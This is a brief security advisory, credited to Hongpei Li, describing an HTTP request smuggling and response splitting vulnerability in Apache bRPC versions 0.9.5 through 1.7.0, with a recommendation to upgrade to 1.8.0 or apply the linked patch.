Hongpei Li

**Name of the Vulnerable Software and Affected Versions** Apache bRPC versions 0.9.5 through 1.7.0 **Description** The issue arises from the `http parser` not complying with the RFC-7230 HTTP 1.1 specification, specifically when handling messages with both `Transfer-Encoding` and `Content-Length` header fields. This can lead to request smuggling or response splitting attacks. In a scenario where a bRPC-made HTTP server on the backend receives requests in a persistent connection from a frontend server that uses `Transfer-Encoding` to parse requests, an attacker can smuggle a request into the connection to the backend server. **Recommendations** For Apache bRPC versions 0.9.5 through 1.7.0, upgrade to version 1.8.0, which fixes this issue. As a temporary workaround, consider applying the patch available at https://github.com/apache/brpc/pull/2518 to mitigate the risk of exploitation.